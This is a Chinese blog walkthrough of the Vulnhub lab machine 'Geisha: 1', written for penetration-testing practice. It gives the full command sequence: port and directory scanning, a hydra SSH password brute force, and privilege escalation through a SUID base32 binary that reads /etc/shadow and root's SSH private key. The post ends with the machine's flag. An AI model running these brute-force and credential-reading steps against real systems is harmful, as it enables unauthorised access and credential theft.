[网络安全学习篇79]:Geisha: 1 Vulnhub 实战

往期博文:

[网络安全学习篇69]:渗透测试实战-DC-1-靶机入侵

[网络安全学习篇70]:渗透测试实战-DC-2-靶机入侵

[网络安全学习篇71]:渗透测试实战-DC-3-靶机入侵

[网络安全学习篇72]:渗透测试实战-DC-4-靶机入侵

[网络安全学习篇73]:渗透测试实战-DC-5-靶机入侵

[网络安全学习篇74]:渗透测试实战-DC-6-靶机入侵

[网络安全学习篇75]:渗透测试实战-DC-7-靶机入侵

[网络安全学习篇76]:渗透测试实战-DC-8-靶机入侵

[网络安全学习篇77]:渗透测试实战-DC-9-靶机入侵

[网络安全学习篇78]:Sumo: 1.1 Vulnhub 实战(脏牛漏洞提权)

[网络安全学习篇79]:Geisha: 1 Vulnhub 实战(本篇)

下期博文:

目录

信息收集

gobuster

攻击

提权

拿到flag


信息收集

arp-scan -l

nmap -A 192.168.1.173 -p- -oN nmap.A

gobuster

gobuster dir -u http://192.168.1.173:7125/ -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt

扫描得到/passwd

curl http://192.168.1.173:7125/passwd -o passwd && cat passwd | grep home

攻击

hydra -l geisha -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.173 -o hydra.geisha && cat hydra.geisha

得到账密:

[22][ssh] host: 192.168.1.173   login: geisha   password: letmein

ssh 登录成功

ssh [email protected]

提权

查找具有suid权限的文件

find / -perm -4000 2>/dev/null

 

使用以下命令,用base32 读取访问受限制的文件 /etc/passwd ,读取成功

base32 "/etc/shadow" | base32 --decode

 

尝试使用ssh 登录root,使用以下命令获得在/root/.ssh 目录下的root用户登录ssh 的私钥

base32 "/root/.ssh/id_rsa" | base32 --decode

拿到flag

拿到其私钥之后,我们可以直接在本地使用该私钥登录root | ssh

vim root.src.key

chmod 777 root.src.key

ssh [email protected] -i root.src.key

flag:

Flag{Sun_CTF_220_5_G31sha}


参考博文:

https://cyb3rbl0g.github.io/geisha-vulnhub-walkthrough/

猜你喜欢

转载自blog.csdn.net/weixin_43252204/article/details/106433428